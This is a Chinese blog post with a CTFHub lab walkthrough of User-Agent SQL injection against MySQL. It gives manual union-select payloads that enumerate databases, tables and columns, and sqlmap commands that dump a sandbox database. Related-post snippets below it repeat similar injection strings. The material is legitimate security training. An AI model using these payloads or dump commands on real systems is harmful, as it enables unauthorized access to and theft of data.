CTFHUB-技能树-Web题-SQL注入-Mysql结构-UA注入

已于 2024-05-09 21:13:59 修改
阅读量564 收藏 3
点赞数 28
分类专栏: CTFHUB解题思路 文章标签: sql mysql 数据库
于 2024-04-08 21:27:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Static______/article/details/137524337
版权

技能树-Web题-SQL注入-Mysql结构-UA注入

文章目录

UA注入

UA注入,即User-Agent注入

手工注入

利用bp抓包,发送至repeater进行判断

看提示

在这里插入图片描述

注入点在User-Agent

虽然有提示,在此还是按常规进行一下注入点判断吧

判断注入点
抓包后,输入1 and 1=1 有回显

在这里插入图片描述

输入 1 and 1=2 无回显

在这里插入图片描述

由此判断,此处为注入点

判断字段数
1 order by 3 无回显

在这里插入图片描述

1 order by 2 有回显

在这里插入图片描述

由此判断,表中有两个字段

判断回显字段数
-1 union select 1,2

在这里插入图片描述

1,2都回显,由此判断可回显字段数为2

爆库名
-1 union select user(),database()

在这里插入图片描述

得到数据库名为sqli

爆表名
-1 union select user(),group_concat(table_name) from information_schema.tables where table_schema=database()

在这里插入图片描述

得到两个表名,尝试查看第一个表中的数据

爆列名
-1 union select user(),group_concat(column_name) from information_schema.columns where table_name='pqqvoicejs'

在这里插入图片描述

得到列名xwprqxhxjd

爆数据

-1 union select user(),group_concat(xwprqxhxjd) from sqli.pqqvoicejs

在这里插入图片描述

得到flag

sqlmap

UA注入 需要用到leve 3

爆库
sqlmap -u http://challenge-24633b96e4dbb170.sandbox.ctfhub.com:10800/ -level 3 --dbs --batch

在这里插入图片描述

爆表
sqlmap -u http://challenge-24633b96e4dbb170.sandbox.ctfhub.com:10800/  --level 3 -D sqli --tables --batch

在这里插入图片描述

爆列名
sqlmap -u http://challenge-24633b96e4dbb170.sandbox.ctfhub.com:10800/  --level 3 -D sqli -T zcvvebogfz --columns  --batch

在这里插入图片描述

爆数据
sqlmap -u http://challenge-24633b96e4dbb170.sandbox.ctfhub.com:10800/  --level 3 -D sqli -T zcvvebogfz -C glotmiduat --dump --batch

在这里插入图片描述

python炒粉
关注
  • 28
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
计算机-mysql-模型驱动的web应用SQL注入安全漏洞渗透测试研究.pdf
07-08
计算机-mysql-模型驱动的web应用SQL注入安全漏洞渗透测试研究.pdf
CTFHub | MySQL结构
尼泊罗河伯的博客
11-13 1666
根据网页显示内容输入1进行测试,此可能存在 SQL 注入。此与前一类似,这次使用手工注入。先判断是否存在注入,发现存在注入后检查注入点。判断字段数量,然后检查数据库位置,知道数据库位置后查看数据库版本和数据库名。接着查看全部数据库名,并查看这些数据库的表名,最后在lvlbiqemvj 表中的数据发现此 flag 。
CTFHUB-技能树-Web-SQL注入-Mysql结构-Refer注入
最新发布
Static______的博客
04-09 927
HTTP Referer是header的一部分,当浏览器向 web 服务器发送请求的时候,一般会带上Referer,告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。用bp抓到包后,将页面中的数据保存到一个txt文件中,用sqlmap爆破(根据reger注入level需要大于三)也就是说,只有当你向浏览器发送请求时,才会带上referer。得到两个表名,第一张表看名字像是自定义的表,尝试爆破第一张表。-p 指定参数,这里为 -p “id”1,2都显示,有两个回显字段。
CTFHub技能树WEB MYSQL结构
weixin_48799157的博客
03-20 1351
小白一个,如有错误请指正! 解法一: 1.这里还是老方法,输入 1, 2 ,3 ,得知字段有两个 2.爆数据库 select * from news where id=123 union select 1,database()# 3.爆表名 select * from news where id=123 union select 1,group_concat(table_name) from information_schema.tables where table_schema..
ctfhub-web-sql-整型注入/字符型注入/报错注入/布尔盲注/时间盲注/mysql结构/cookie注入/ua注入
2301_80162151的博客
03-01 755
id=1’ and sleep(5) --+,看网络有没有延迟,有的话就是存在时间盲注。(完全没变化的页面,这种情况我们可以利用时间函数来判断数据有没有在目标数据中得到执行。技能树的这些sql,肯定是存在,所以直接sqlmap获取库名。sqlmap -u url -D 库名 --tables。时间型的注入遇到的条件更为苛刻,数据交互完成以后目标网站。聚合函数也称作计数函数,返回查询对象的总数。判断页面是否正常,1=1和1=2是俩个页面。慢慢等一会,他有点慢,出现了库名sqli。函数 获取字符串的长度。
CTFHUB-WEB-SQL注入-MySql结构
weixin_49539962的博客
08-05 86
终于不是用flag做表名,下面依次看两个表的内容就行。news之前几都与flag出现过,应该是把flag换成pvrxgcvlli。前面的几用的都是MySQL数据库,所以这里的解法其实和整数型、字符型注入区别不大。按提示输入一个1,回显有两列,看看这两列是不是都有用。那接下来就依次看数据库名、表名、列名和flag名就行。
计算机-mysql-基于Web应用的SQL注入攻击入侵检测研究.pdf
07-08
计算机-mysql-基于Web应用的SQL注入攻击入侵检测研究.pdf
CTFHub技能树WEBUA注入
weixin_48799157的博客
03-20 2005
小白一个,如有错误请指正! UA就是User-Agent的缩写,中文名为用户代理,是Http协议中的一部分,属于头域的组成部分,它是一个特殊字符串头,是一种向访问网站提供你所使用的浏览器类型及版本、操作系统及版本、浏览器内核、等信息的标识。通过这个标识,用户所访问的网站可以显示不同的排版从而为用户提供更好的体验或者进行信息统计。 个人感觉UA注入和Cookie注入是有点像的,都是从请求头中修改参数,payload和普通的union注入是一样的。 解法一: Burps...
CTF】【ctfhubMysql流量
qq_43498726的博客
01-10 3080
【工具】wireshark 【知识储备】流量分析类的目大多需要用到wireshark进行抓包分析 因为之前接触过wireshark,我直接用kali虚拟机中的wirshark进行此次实验,所以没有wireshark安装过程。 直接利用搜索功能进行流量字节字符串搜索“mysql”(本就是关于mysql,还有一种tips就是ctfhub上面的flag都是以ctfhub开头,直接搜索“ctfhub”也可以) 如果搜索的时候mysql需要在mysql包中一个一个查找,能够找到一个含有flag的数据 复制
CTFHub解-技能树-Misc-流量分析-数据库类流量【MySQL流量、Redis流量、MongoDB流量】
wlw_xx的博客
08-15 1421
CTHUB wireshark简单学习
CTFHUB-SQL注入-MySQL结构
u014794539的博客
07-10 451
考点 MySQL数据库结构 数据库1 = 网站1 表明 列名 数据 数据库2 … 数据库3 … 分析过程 ?id=1 and 1=1 ?id=1 and 1=2 ?id=1' and1=1# 上句执行了下两句未执行 存在注入 查字段 1 order by 1 1 order by 2 1 order by 3 2执行 3不执行了 两个字段 查看当前数据库 233 union select 1,database() 库名还是sqli,看表 233 union select 1,grou
CTFHub技能树web(持续更新)--SQL注入--UA注入
jiuyongpinyin的博客
09-05 458
UA注入 首先根据目的提示,告诉我们输入点在User-Agent,所以我们抓包进行尝试: 我们发现了返回值不光有user-agent的数据,前面还有查询语句,那么我们输入一个1试一下: 到了这里是不是有点熟悉了,和上一篇cookie注入一样了,那么我就不废话,先通过order by语句查询几列,发现两列的时候回显正常,接着我们使用联合查询: 注入成功了,我们爆破当前数据库: 得到数据库,爆破数据库的表名: 得到了奇怪的表名,查看这个里面的列: 得到列,查询里面的字段: 得到flag 注:萌新
CTFhub技能树web-SQL注入
Mccc_li的博客
04-05 1225
1.数字型 1 and 1=1 正常输出 1 and 1=2 不输出 存在数字型注入,接下来猜字段 1 order by 1,2输出正常 1 order by 1,2,3不输出,所以有两个字段 1 and 1=2 union select 1,database(),看数据库名字 1,group_concat(table_name)from information_schema.table...
# CTFhub MySQL结构
plant1234的博客
06-18 716
MySQL结构: 需要了解mysql的知识点: union select 联合查询,联合注入常用 database() 回显当前连接的数据库 version() 查看当前sql的版本如:mysql 1.2.3, mariadb-4.5.6 group_concat() 把产生的同一分组中的值用,连接,形成一个字符串 information_schema 存了很多mysql信息的数据库 information_schema.schemata information_schema库的一个表,名为schemata
CTFHub_技能树_WebSQL注入——整数型注入
Ho1aAs‘s Blog
07-23 422
文章目录使用工具过程思维导图完 –>CTFHub传送门<– 使用工具 Microsoft Edge v84.0.522.40 SQLMAP Python3.6 过程 查询是基于sql指令,用SQLMAP注入 首先检查数据库有无注入点 D:\Python3.6.8\sqlmap>python sqlmap.py -u http://challenge-16c04c6e4ee7556d.sandbox.ctfhub.com:10080/?id=1 一直回车后,CMD返回了以下指令
sql手工注入漏洞测试(mysql数据库-字符型)
06-28
### 回答1: SQL手工注入漏洞测试通常是通过构造恶意输入来测试数据库系统的安全性,以检测可能存在的漏洞。在针对MySQL数据库的字符型注入测试中,攻击者会尝试利用输入表单中的字符型数据来破坏SQL语句的可靠性,进而获取对数据库的访问权限。 攻击者通常会使用一些SQL注入工具,例如SQLMap、Havij等,通过模拟输入表单来测试Web应用程序是否存在SQL注入漏洞。在手动测试的过程中,攻击者需要了解目标系统中数据库结构和使用的语言,并通过逐步构造恶意输入数据来尝试绕过系统的安全验证和防火墙,以获取对数据库的访问权限。 为避免SQL注入漏洞的产生,建议采用安全性更高的编程语言和框架,例如使用预处理语句、输入验证和过滤技术,同时定期对Web应用程序进行漏洞扫描和安全性检测,以降低数据库被攻击的风险。 ### 回答2: SQL注入是一种利用网站未正确过滤或验证用户输入数据的漏洞,通过构造一些特殊的SQL查询语句,来实现绕过网站的权限控制或者直接在数据库上执行一些恶意操作的攻击技术。SQL注入漏洞是常见的Web安全问之一,并且MySQL是被广泛使用的数据库之一,因此测试MySQL数据库的手工注入漏洞测试也是非常必要的。 手工注入漏洞测试有多种方法,最常见的是利用逻辑性错误和SQL语句字符转义的脆弱性来构造恶意的SQL查询语句。首先,我们可以查找网站的URL参数和表单输入框,尝试在这些输入框中输入一些特殊字符(例如单引号,双引号和分号),看看是否能够返回一些不同寻常的错误信息。如果页面返回了一些SQL错误信息,那么很有可能存在SQL注入漏洞。 接下来的一步是手动构造SQL查询语句,注入恶意的代码。一般来说,SQL注入漏洞的主要攻击方法是利用SELECT,UPDATE,DELETE和INSERT等操作语句。我们可以在URL参数或表单输入框中输入如下代码片段,来测试是否存在漏洞: 1. SELECT * FROM users WHERE username='admin' AND password='' OR '1'='1'; 2. SELECT * FROM users WHERE username='admin' AND password='' UNION ALL SELECT 1,2,3; 3. SELECT * FROM users WHERE username='admin' OR 1=1# AND password=''; 上述代码分别用于测试逻辑性错误漏洞、UNION注入和基于SQL注释的漏洞。如果我们能够成功执行这些恶意代码,那么就说明存在SQL注入漏洞,攻击者可以使用类似的代码片段来执行任意的SQL查询。 为了防止SQL注入漏洞,可以采取以下措施: 1. 输入过滤:检查输入数据是否包含恶意代码和SQL语句特殊字符,并过滤或转义掉这些字符。 2. 预编译语句:使用PreparedStatement或其他预编译语句可以避免SQL语句被拼凑,从而避免SQL注入漏洞。 3. 限制查询权限:限制数据库用户的查询权限,并使用最小特权原则。 总之,在进行MySQL数据库的手工注入漏洞测试时,需要充分理解SQL注入漏洞的原理和漏洞类型,并采取适当的防护措施来保护Web应用程序的安全性。 ### 回答3: SQL注入漏洞是常见的网络安全漏洞之一,而SQL手工注入漏洞测试是一种检测和验证SQL注入漏洞的方法。在Mysql数据库字符型注入漏洞测试中,我们需要先准备好一台虚拟机或者真实主机,然后搭建好LAMP或者LEMP环境,以便进行后续的测试。 1. 测试目标 首先确定我们要测试的目标,这可以是一个网站,或者是一个具有数据库功能的应用程序。我们需要了解和分析目标,找到目标系统的漏洞点,才能有针对性地进行注入漏洞测试。 2. 确认注入点 找到目标系统的漏洞点后,我们需要确认注入点,这就是通过输入特定的字符序列来判断系统是否存在SQL注入漏洞。在Mysql数据库字符型注入漏洞测试中,我们可以使用’和”这两个字符进行测试来确定注入点。 例如:我们可以输入以下字符序列来测试系统是否存在SQL注入漏洞:“'or 1=1#”,如果直接返回了数据,则说明该系统存在SQL注入漏洞。 3. 确认数据库类型和版本 在进行注入漏洞测试之前,我们需要知道目标系统所使用的数据库类型和版本。在Mysql数据库字符型注入漏洞测试中,我们可以通过以下语句来确定数据库版本: select version(); 4. 利用SQL语句注入漏洞 当我们成功确认时,就可以利用SQL语句进行注入漏洞测试了,具体的方法如下: a. 使用union查询合并数据:可以输入以下字符序列来进行测试:‘+union+select+1,2,3#',如果成功,则系统会返回一个由“1,2,3”组成的数据集。 b. 使用group by控制查询结果:可以输入以下字符序列来进行测试:‘+union+select+1,count(*)+from+table_name+group+by+1#',如果成功,则系统会返回各个数据组的数量。 c. 使用order by控制查询结果排序:可以输入以下字符序列来进行测试:‘+union+select+1,2+from+table_name+order+by+3#',如果成功,则系统会返回具有排序的数据集。 5. 总结 以上就是Mysql数据库字符型注入漏洞测试的基本步骤和方法。当然,注入漏洞测试是一项繁琐的工作,需要有一定的技术水平和丰富的经验。在进行注入漏洞测试之前,一定要保证进行充分的备份和风险评估,以防止对目标系统造成不可逆转的损失。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

python炒粉

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值